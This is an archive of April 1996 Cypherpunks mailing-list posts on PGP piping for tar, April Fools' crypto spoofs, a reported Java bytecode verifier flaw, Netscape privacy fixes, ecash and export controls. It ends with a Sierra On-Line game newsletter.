if ("$1" == "-d") then
  exec pgp -d -f
else
  exec pgp -e -f
endif




The only problem is that this doesn't work well for
larger amounts of data, because pgp reads in all
data before starting with its work.


Perhaps a future release of pgp will have a real filter
mode.


Hadmut

BTW: Does this "crypto-hook" cause export restrictions to 
apply on gtar ?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMV/0tmc1jG5vDiNxAQFtAAP/TMuYeYf5q7k1Y8DrBjb6XFKYYFANH3RH
FvThWq1BUgI+unH97EZkNkCzZJYT5qmLGk3+JLufCAw/o9YR7jKcldm2LNYJ96t2
BDcSGDF3qx/IUzQBa5NV+gUerNRVSwA3LzkTbXufOxYH0cB3KNcsx3B0bE1rEDa/
GCcJ1L6T+2s=
=FMiZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 2 Apr 1996 17:57:16 +0800
To: Tim Scanlon <tfs@vampire.science.gmu.edu>
Subject: Re: New release of SFS available
In-Reply-To: <9604020207.AA07119@vampire.science.gmu.edu>
Message-ID: <Pine.SUN.3.92.960401190613.7317B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



Well I guess it wouldn't be much of a `fool' if it didn't fool *anyone.*

But TIm, Tim.... your mother?  Your sister?  It wasn't halfway subtle.

(If it had been the `Canadian library barcode' spoof, we could understand.
 That one was so credible I'm afraid it may give the bad guys ideas.)

Charles Bell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 2 Apr 1996 18:33:31 +0800
Subject: Complete Waste of Bandwidth
Message-ID: <Pine.ULT.3.91.960401203318.22029D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As you may remember, I wrote the Geek Code.

Well, for those that care, run on out and pick up the April 18th issue of 
Rolling Stone (it has a 1/2 naked guy on the cover) and take a gander at 
page 20.  It's and article about yours truly and the Geek Code.

Cool, eh?

*grin*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMWB2LjokqlyVGmCFAQEX4gP/TRTZjtPrlF0mD6gGwz/qyc1+dQpzP/ae
T9H/jojqSxX5o1BYC1DEQQtAW/K28VKMRvaAlx7tqIxMvNPyVHGIcDqSovzTDo8C
D5P79xQR+NGuzWZFaOsIOT89vWw3JF8nw8ug2oqQIxlwqWqqk9ju6JRa+yywC6K9
xlAIYiDK3XM=
=+X1Q
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GED/J d-- s:++>: a- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 2 Apr 1996 17:38:52 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) Russians Break RSA?
In-Reply-To: <ad856eda0f021004dc93@[205.199.118.202]>
Message-ID: <kRiqLD75w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
...
> Here's the report on a news conference announcing the cracking of
> their Kolmogorov system, which is equivalent to our own RSA. I haven't
> had a chance to talk to John Markoff, who was at the press conference,
> to get his comments.
...

You know, it was pretty funny last time Tim May announced that the Russians
broke the RSA on April 1st.  I guess those who haven't seen this before
still might find it funny.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 2 Apr 1996 18:00:43 +0800
To: cypherpunks@toad.com
Subject: Re: Witch Hunts
In-Reply-To: <Pine.SUN.3.91.960331160359.9821B-100000@rwd.goucher.edu>
Message-ID: <J8iqLD77w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Zambini <jlasser@rwd.goucher.edu> writes:
> On Sun, 31 Mar 1996 JonWienke@aol.com wrote:
> > Unicorn = Detweiler = Agent Provocateur
>
> Well, I won't say it's impossible.

Don't you get the hint -- Unicorn == Sir Lancelot == Lance.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 2 Apr 1996 21:39:49 +0800
To: cypherpunks@toad.com
Subject: Re: New release of SFS available
In-Reply-To: <199604010448.QAA25352@cs26.cs.auckland.ac.nz>
Message-ID: <9604020207.AA07119@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text


pgut001@cs.auckland.ac.nz
> 
> I have just uploaded version 1.19 of SFS to the grumbo.uwasa.fi FTP site as:

> take billions of years to exhaust via a brute-force search.  However in order
> to satisfy the requirements of various organizations such as the Chinese
> government (who need to ensure that no nasty outside influences pollute the
> minds of their citizens) and to allow the originators of the 83.5% of all
> Usenet traffic which contains porn to be prosecuted (a recent example being the
> widely publicised move by the Office of the Bavarian Illuminati to force
> Compuserve to drop all sex-related newsgroups), SFS 1.19 will store 2032 bits
> of the key in the clear along with the encrypted data.
> 
> The head of the FBI Louis Freeh has been quoted as saying that "this will
> provide adequate protection against your little sister or your mother, while
> allowing law enforcement agencies to investigate people using encryption for
> illegal purposes".  The head of the French DSSI agrees: "There have been too
> many cases of industrial espionage by foreign government intelligence agencies.

Remind me not to use this junk. Ever. 

In the USA we still have a right to privacy. I don't give a damn about
the "needs of law enforcement" simply becasue the perception of their
needs has grown beyond the reality of what they actualy "need". If left
up to many of the worlds LEO's, there would be taps on all phones and
cameras on every corner. Their jobs would be easy, and that's what
they want.

The desires of law enforcment organizations are fundementaly at odds
with a free populace and the actualization of liberty in the practice
of law. Software like what has been described above serves only as
an example of that in my mind.

Tim Scanlon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Tue, 2 Apr 1996 21:44:00 +0800
To: cypherpunks@toad.com
Subject: Ecash Article in ID
Message-ID: <9604020237.AA20467@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is a resend, but my subject didn't match the content in the last send

{
Found an interesting article on Ecash in Industrial (Internatioal) Design.

/ What is Money /
Karrie Jacobs
ID March/April 96
}
_______________________
Regards,            Those who would have nothing to do with thorns must 
                    never attempt to gather flowers.
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 2 Apr 1996 19:14:21 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Navajo Code-Talkers
In-Reply-To: <ad8389c002021004b128@[205.199.118.202]>
Message-ID: <199604020558.VAA07216@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Tim wrote:

> 
> I'd venture that NSA also has large staffs of language experts, to
> interpret the COMINT stuff vacuumed up.
> 
    A friend's next-apartment neighbor back in NYC in the late '60s
    was an ex-NSA type. Sat on a radio intercept feed near the USSR 
    because he spoke Russian.

    b




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 2 Apr 1996 20:21:40 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Java flaw is in bytecode verifier
In-Reply-To: <199604020006.QAA21649@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.960401222618.12235C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


My bet is currently on the flaw being due to a silly mistake in some part of 
the code dealing with returns from finally handlers. The Suspense Is 
Killing Me :)

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "FRank O. Trotter, III" <fotiii@crl.com>
Date: Tue, 2 Apr 1996 19:15:40 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199604020424.AA05832@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Quite a time to go on vacation and have the power supply to my laptop
first show wires then break!  A great series of rants about the
backing of ecash, and I missed most of it (at least in real time).  I'll add 
a few of my thoughts and see if it all goes any further.

Ecash is a means of transferring value, currently USD at Mark Twain,
betweeen parties.  Ecash, however denominated, is not a currency in
itself.

Any "currency" or other "value units", be it USD, DEM, gold, silver,
coupons, etc can be transferred by the ecash system.  The Mint
licensee must agree and then issue the units.  This is, after all,
software.

The value unit or currency has value because people agree it has
value.  CyberBucks were (and still are) somewhat convertable to
tangible goods - they are for sure convertable to intrinsic goods as
demonstrated by the CyberBucks trial.  USD and DEM have value only
because we all accept them as payment - as fiat currencies there is no
formal backing.  Gold has value because ...

One of the keys in any system is that users feel comfortable about the
future value of the units or currency, be the units a national
currency, a commodity, or a coupon.  There are two components to this:
 
1)  The user must believe that they will receive the units back from
      someone at a later date - this is plain old fashion credit risk.  For
      example if  I am running an ecash system with gold then you have to
      believe that I will give you gold upon request - same for USD and this
      is why banks for the time being should be the primary issuer to avoid
      a general credit risk.  If users are unsure or unable to determine if
      the Mint operator will return the nominal value of the units then
      there is not enough confidence to run a system.  Consider pre-FDIC
      days in US banking.

2)  The user must believe that the units will have a value in the
      future.  We can agree that FOT Units are each worth US$1.0 million
      today, but how will their value be determined tomorrow?  Non-national
      currency, however attractive from a theoretical standpoint is weak
      under this guideline.  

I am a strong believer that ecash will support many national
currencies, commodity based implementations such as gold and silver,
as well as coupons and commercial equivalents.  Use of ecash for
payments will depend only on the creative uses presented by someone
willing to sell at a profit a product that attracts customers.

There is likely some point where a non-national currency will become
attractive first to the internet community, then to the public at
large.  If done with low credit risk it can survive.  You should
consider that  two of the key elements to determine value are
precisely known in ecash and not in circulating money - money supply
and velocity.  One now has only to consider other factors like
purchasing power to obtain a base value.

Ecash puts banks back into the business of being banks - acting as a
storehouse of value, and as a means to transfer this value, all for a
fee.  The early bank models were exclusively along these lines, with
the various lending and investing functions added later.

All for now, a start anyway.

FOT
Disclaimer - Personal not corporate thoughts.
Frank O. Trotter, III  -   fotiii@crl.com
www.marktwain.com  - Fax: +1 314 569-4906
--------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 2 Apr 1996 19:13:45 +0800
To: quester@eskimo.com (Charles Bell)
Subject: Re: New release of SFS available
In-Reply-To: <Pine.SUN.3.92.960401190613.7317B-100000@eskimo.com>
Message-ID: <9604020344.AA07783@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text


>Charles Bell
> 
> 
> Well I guess it wouldn't be much of a `fool' if it didn't fool *anyone.*
> 
> But TIm, Tim.... your mother?  Your sister?  It wasn't halfway subtle.
> 
> (If it had been the `Canadian library barcode' spoof, we could understand.
>  That one was so credible I'm afraid it may give the bad guys ideas.)
> 

	heh, Hook, line, AND sinker.

This is what happens when your link is down for 4 days and you
try to get through c'punks back-mail at a fast pace, thinking
that the stuff you're looking at is 3-4 days old.

On the other hand, everyone in my family uses email, and my sister
(the english major in the bunch) has asked about stuff like using pgp
to send intimate mail to her boyfriend. And one of my brothers,
(the cattle farmer) has asked 'if there's an easy way that I can mail
some financial stuff without worrying about people reading it. Like
useing that codes stuff you talk about'.

They both just like privacy. Even my mom has said things like "go watch 
TV or something while I'm doing my mail". 

So the mother & sister part didn't really raise any flags. I've gotten
over the culture shock of everyone (and their mother) wanting to be
on the 'net awhile back. Course looking back at it I'm going "waitaminute"

In any case I'm sitting here laughing about it. Being taken in now and
then by a good joke is an ok thing. It's going to force me to plot
something devious for next April fools day. ;)


Tim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Tue, 2 Apr 1996 21:06:29 +0800
To: hfinney@shell.portal.com
Subject: RE: Java flaw is in bytecode verifier
Message-ID: <009A03A6.DE3AF020.818@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


In Article: <199604020006.QAA21649@jobe.shell.portal.com>, Hal <hfinney@shell.portal.com> wrote:
# From http://java.sun.com/sfaq/960327.html:
# > Researchers at Princeton recently found an implementation bug in the Java
# > bytecode Verifier. The Verifier is a part of Java's runtime system which
# > certifies that applets downloaded over the Internet adhere to Java's
# > language safety rules. Through a sophisticated attack, a malicious applet
# > can exploit this bug to delete a file or do other damage.

# This is one of the more worrisome places for a bug to exist.  Much of
# Java's security rests in the claim that it can screen for and detect bad
# bytecode sequences.  This screening code is extremely critical for Java
# security and I am surprised to see that it was implemented in a flawed
# manner.

# I've been writing Java quite a bit in the last couple of weeks, and I
# find that I have crashed my browser, whether Netscape or appletviewer,
# many times.  Granted some of my code has been pretty buggy, but it's
# still not supposed to crash the browser.  Obviously some of the runtime
# checks are not being done properly.  I had expected that the bug would
# be in these areas, something like the stack overflows that we have seen
# cause problems in the past.  A simple error in the bytecode verifier
# (if that is what this really is) seems like a more fundamental security
# flaw.

# The researchers have still not released full details on the bug, although
# they had planned to do so by the end of March.  Maybe they are waiting
# for the fix to be distributed.

As I keep saying (multiple times, in multiple forums) "Java is still in
Beta-Test."  Sun acks/grocks this, although Netscape ships most of their
production-level browsers with Java enabled by default.

The primary reason for releasing beta software is to catch any discrepancies
between the documented behaviour and the implimented behaviour of a product.
Bugs WILL be found in beta testing.

To reiterate: "If you insist on being on the bleeding edge, you WILL bleed."

This has been a test of the emergency reality-check service.
Had this been a real reality-check, the software in question would be labeled
"golden" and you would be provided with a "support@foo.bar.com" email address
to contact for your product.

Again this is only a test, and is (as such) non flamable.  Any party that might
take offense to this message should re-read the contents of the message, and
either A) re-evaluate their perception of it, or B) re-evaluate their
practices.

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Tue, 2 Apr 1996 21:03:11 +0800
To: Brian D Williams <talon57@well.com>
Subject: Re: Navajo code-talkers
In-Reply-To: <199604012155.NAA00640@well.com>
Message-ID: <Pine.3.89.9604012350.A16196-0100000@netcom21>
MIME-Version: 1.0
Content-Type: text/plain



	Brian:

On Mon, 1 Apr 1996, Brian D Williams wrote:

>  Navajo also has something now it didn't have before WWII, a
> written language, and I believe a rudimentary dictionary.

	A couple of grammers, and three or four dictionaries.
	And classes are offered in it, by at least two colleges
	in the US.  

	<< It's one of the status languages to study, if you are
	a new ager --- along with Ancient Mayan, linear B and
	Egyptian Hieroglyphics.  >> 

        xan

        jonathon
        grafolog@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Tue, 2 Apr 1996 19:39:52 +0800
To: cypherpunks@toad.com
Subject: Re: New release of SFS available
Message-ID: <2.2.32.19960401173939.0069af18@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 04/1/96 -0500, Tim Scanlon <tfs@vampire.science.gmu.edu> wrote:
            ^^^^^^^
>pgut001@cs.auckland.ac.nz
>> 
>> I have just uploaded version 1.19 of SFS to the grumbo.uwasa.fi FTP site as:
...
>> The head of the FBI Louis Freeh has been quoted as saying that "this will
>> provide adequate protection against your little sister or your mother, while
>> allowing law enforcement agencies to investigate people using encryption for
>> illegal purposes".  The head of the French DSSI agrees: "There have been too
>> many cases of industrial espionage by foreign government intelligence
agencies.
>
>Remind me not to use this junk. Ever. 

Got one! Reeeeeeeeel 'im in!

ROFLMAO

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 2 Apr 1996 20:53:53 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: A MODEST PROPOSAL (fwd)
Message-ID: <199604020804.AAA14605@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This happens any time anybody signs up with an an######@anon.penet.fi address.
Ideally, someone could, in their copious spare time, hack majordomo
to automatically translate all subscription requests of that form to
na######@anon.penet.fi ; as an alternative, if majordomo has some sort
of subscription blocking list an*@anon.penet.fi belongs on it.

At 07:35 PM 3/30/96 -0800, Sandy wrote:
>has anyone had the sort of problem mentioned below?

>From: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
>To: sandfort@crl.com
>Subject: Re: A MODEST PROPOSAL
>From:	IN%"sandfort@crl.com"  "Sandy Sandfort" 26-MAR-1996 16:57:18.92
>>Wilco.  I'm collecting names for an addendum now.
>	Thanks. Incidentally, I recently had a problem with posting to
>the cypherpunks list; it consisted of the message getting sent to anon.penet.fi
>instead. This looks like someone trying to find out anon.penet.fi anon IDs;
>however, it wouldn't work due to the password requirement. Have you heard
>anything about this? 
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281

1995: Chat rooms, espresso, and Linux
1996: Exon, melatonin, and Java.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 3 Apr 1996 02:37:02 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: caching of form posts in netscape (was:(none))
In-Reply-To: <v02120d88ad834ab42177@[192.0.2.1]>
Message-ID: <3160E338.1805@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> Yes, Netscape caches passwords.
> 
> [ forwarded message from sfnb deleted ]

  The problem is that form post data was being used as part of the database
key for storing and accessing form posts in our cache.  The current
work around for this problem is to use the 'pragma: no-cache' HTTP header.

  I just sat down with the responsible engineer and helped him fix this.
The fix will be in our next beta (marketing name of Atlas Preview Release 2,
user-agent of Mozilla/3.0b3).

  This next beta will also include several other security/privacy related
features/preferences:

	1) Preference to enable sending of email address for anon ftp password.
	   The 2.0 release always sends "mozilla@" as the anon ftp password, to
	   protect the privacy of our users.  We are now giving the user the
	   ability to enable sending of their e-mail address if they choose.

	2) Warning dialog on "mailto:" form posts.  The user will be warned
	   that the form submission is via e-mail and will be given the
	   opportunity to cancel the operation.  The warning can be turned
	   off via a preference.

	3) There will be an option to enable/disable disk caching of documents
	   retrieved over an SSL connection.  The current (2.01) behaviour
	   is to always cache such documents in the absence of the
	   "Pragma: no-cache" header.  The new option will default to not
	   caching SSL-fetched documents, but will allow the user to enable
	   caching if they desire.  This option will not effect caching
	   of documents retrieve in the clear via un-encrypted http (which
	   can be disabled by turning off the disk cache).

	4) Dialog for cookie acceptance.  There will be an option to enable
	   a dialog that will be displayed whenever you are sent an HTTP cookie.
	   This dialog will allow you to discard the cookie.

	5) You will be able to disable/enable SSL2 and SSL3, and the specific
	   cipher-suites.  For example, if you use the US-domestic version of
	   the navigator, you can turn off the export ciphers to ensure that
	   you never send any data over SSL using 40-bit secret keys.

  I look forward to any feedback people may have on these new options once the
new beta is out.  Sorry, but I can't tell you the exact date yet...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 2 Apr 1996 23:39:27 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks investigated, FOIA?
Message-ID: <wlM=e5S00YUvNSMmMO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From sgs@well.com:


 Have the cypherpunks requested data on whether they are being investigated
 by the same agencies under the FOIA individually or as a group listed by
 that name? If so, what are the results, if any, so far?


Does anyone know if this has been done? The FOIA, that is.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 2 Apr 1996 21:38:00 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: Test case for RSA t-shirts
In-Reply-To: <315D7895.307AB61A@cs.berkeley.edu>
Message-ID: <3160E64E.46C9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Del Torto wrote:
> 
> At 1:08 pm 3/30/96, Raph Levien wrote:
> >   While we're on the subject, I called Sam Capino's office regarding my
> >CJR for this t-shirt, and he said they were still waiting for a response
> >from the NSA. I think my next move will be a letter asking exactly when
> >I can expect a response, and whether there's anything I can do to compel
> >a response, It was originally filed (in October) as a 15-day expedited
> >review.
> 
> FYI, PRZ mentioned to me last night that the CJR on the OCR-able book of
> PGP source is still pending. The "15 days" has stretched into about a year
> in that case, if I don't have my dates/the facts wrong. Bob Prior at MIT
> would know.
> 
> So much for expediency in commerce.

  I don't think that either the book or the t-shirt qualify for the expedited
review.  My brief skimming of John Gilmore's CJR site a few months ago left
me with the impression that only mass market commercial software that fit
within the SPA/govt deal (40-bit RC2 or RC4 with RSA keys <= 512-bits) was
eligible to be expedited.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CINDYV@sierra.com (Sierra On-Line)
Date: Wed, 3 Apr 1996 13:40:31 +0800
Subject: E-News!
Message-ID: <199604021514.HAA01321@www.sierra.com>
MIME-Version: 1.0
Content-Type: text/plain


 Sierra On-Line E-News                  Issue 1.1, April 1996
------------------------------------------------------------------

Welcome to the first ever Sierra On-Line electronic newsletter!  It's informative, it's free, and it doesn't kill any trees.  In each issue, you'll find information on new releases, behind-the-scenes peeks at products in development, great bargains you won't be find anywhere else, and possibly even a hint or two.  Look for the following departments (and make sure to check the end of this newsletter for a chance to win five free Sierra games!):

  *Headlines (news so hot, we had to mention it first)
  *Games (there's always an adventure in store at Sierra)
  *Home Productivity (great stuff for the home system)
  *Kidstuff (products even a mother will love)
  *The Virtual Store (hot deals and bargain prices)
  *Web News (what's new with Sierra's website)
  *Technical Support (don't blow up that computer!)

You're getting this newsletter because you clicked one of the "yes, I'd like more information" boxes when you registered on our website.  Assuming that we aren't kidnapped by Martians (always a danger), you'll find one of these virtual newsletters in your mailbox about once a month.  If you'd like to unsubscribe for whatever reason (too much mail already, allergic to newsletter electrons, gave up computer games so you'd have more time for macrame), all you need to do is mail us at UNSUBSCRIBE@SIERRA.COM, with your e-mail address as the Subject: line.  If you later regret the decision and would like to re-subscribe, just send a note to SUBSCRIBE@SIERRA.COM.  And now, with the administrative stuff out of the way, let's go on to the interesting bits:

HEADLINES
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~  
New Member of the Sierra Family
----------------------------------------
The big news here is Sierra's acquisition of Papyrus, maker of the top-selling Indy Car and NASCAR racing simulations.  And with games as incredible as those, who wouldn't want to buy the company?  Well, apparently the Software Publishers Association shares our opinion, since Indy Car II just won no less than two Codie awards, one for Best Sports Software and the other for Best Simulation Software Program.  If you haven't seen Indy Car II, you may want to check it out.  After all, if your last name's not Unser or Andretti, this may be your only chance to win!

            http://www.sierra.com/sierra/papy/home.htm


GAMES
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~  
Everybody Wants To Rule The World 
-------------------------------------------
Have you ever had one of those days when you're sitting at your desk, looking at everybody else's emergencies spilling out of your in-box, and think to yourself, "You know, if I were king of all these idiots, I'd feed `em to the crocodiles"?  Well, your chance at imperialist expansion is on the way.  We've just put the finishing touches on The Rise and Rule of Ancient Empires.  Imagine the opportunity not only to carve your own empire out of untamed wilderness (or out of the ruins of your enemies' cities), but also to stomp your friends and co-workers along the way!  Rise and Rule has everything going for it:  full modem and network support, a wide range of cultures to choose from, a great CD-audio soundtrack, lots of fully-rendered cut-scenes, even different architectural graphics depending on which culture you're playing.  If you liked Caesar II, then this game is the next step forward.  Our Technical Support department has been playing a lot of it after-hours, and I think i!
!
t's safe to say that we're hooked.  Bottom line: this is definitely THE game for anyone with a taste for global conquest. 

	http://www.sierra.com/games/riserule

News From The Officers' Club
----------------------------------
If it's contemporary warfare that you're after, then you'll definitely want to check out Silent Thunder: A-10 Tank Killer 2.  This is one kicking, white-knuckled, joystick-killing ride.  Even the critics are raving:  PC Gamer says that Silent Thunder has "the best terrain graphics ever seen in a flight sim" and  Strategy Plus says that it includes "incredible terrain graphics and all the best features of the original A-10 game, pushed to current cutting edge levels."  My cousin says that it's an absolute nuisance, since now he can't get his wife off the computer.  If you're a fan of the original A-10 Tank Killer, or of combat flight simulations in general, you'll find a lot to like in this game.  And, since it is just a game,  the best part is that even if you crash into the ground in a ball of flames and twisted metal, the worst thing that might actually happen is that you'll spill your drink into the keyboard when smashing both fists into the computer table.

	http://www.sierra.com/games/sttank

Surface To Air
----------------
If  you prefer futuristic combat, then perhaps you're ready to fight that final desperate battle against Cybrid world domination.  In the newly-released EarthSiege 2, that war will turn about as vicious as a mother rhino protecting her young.  All-new HERCs with all-new weaponry maximize the possibility for destructive fun.  And if you ever found yourself playing the original EarthSiege and saying, "You know, I could take that bad boy out in three seconds if this thing could only FLY," you're in luck;  one of the new HERCs is an airborne combat monster.  So sign on for another tour of duty, and this time we'll promise you the dream of every HERC pilot ... bigger guns.

	http://www.sierra.com/games/es2

Desktop Athletes Battle It Out Online
--------------------------------------------
On the interactive end of things, the results are in from the first-ever "Sierra Bowl".  If you're not a CompuServe or America Online user, you may have missed out on hearing about this, but it was an absolute blast!  The champion of AOL's Front Page Sports: Football Pro league faced off against CompuServe's champion in a winner-take-all game held just before the real Super Bowl.  We ran the game right here at Sierra on a copy of FPS: Football Pro `96, and simul-cast all the action live on both AOL and CompuServe.  (Hey, none of us had tickets to the real Super Bowl, so we had to make our own!)  The winner was CompuServe's Chris Muller (representing Dallas), who took home a plethora of nifty prizes including a color TV, 10 hours of free online time on both AOL and Compuserve, a Barry Sanders autographed football, a Football Pro Design Team T-shirt, and, of course, the coveted Sierra Bowl trophy.  

	http://www.sierra.com/sierra/online/ossb/ossb.htm


KIDSTUFF
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~  
Kudos For "Lost Mind Of Dr. Brain"
-------------------------------------------
Bragging time:  one of my favorite Sierra programs just won the Software Publishers Association's Codie award for Best Home Learning Program for Adolescents.  And if you think that The Lost Mind Of Dr. Brain is only for kids, then you're in for a surprise the first time you find yourself trying desperately to get past the Synaptic Cleft puzzle just ONE LAST TIME ... at three in the morning.  I speak from experience.  Don't say I didn't warn you.

	http://www.sierra.com/games/drbrain

"Playtoons" `Toons In
--------------------------
If you've got kids, then you're probably very familiar with Saturday morning cartoons.  Kids and `toons go together like peanut butter and jelly (or, in my cousin's house,  peanut butter and waffles ... bleah).  Now you can give your kids the tools to create their very own cartoons on your home PC or Mac.  Sierra's new Playtoons series gives kids a chance to write, direct, edit, record, and play a nearly limitless set of animated sequences in a variety of absurd and fun situations.  Educators would say that it "promotes creative thinking."  This is true, but personally what I would say is that it keeps them off the TV so you can watch reruns of "The Dukes of Hazzard".  (Two great reasons to pick up a copy!)  Look for no less than four new Playtoons titles in the near future.


WEB NEWS
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~  
If it's been a while since the last time you logged onto our website, there's a few good reasons to go take another look.  One I think you'll particularly like is our new Chat area.  (Right now, this area is open to Netscape 2.0 users only, but we're working on it!)   We'll be using the Chat forum to host regular conferences with game designers and developers.  To start it off, we hosted a discussion on Friday, March 15th, with the designers of the upcoming Front Page Sports: Baseball `96.  And to celebrate the fact that we signed last season's Cy Young award winner Randy Johnson to help us out with this new game, we even gave away free Sierra products during the chat session.  Sound cool?  Then be there for the next one!
	
	http://www.sierra.com/bin/club/chat/sierrachat


THE VIRTUAL STORE
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~  
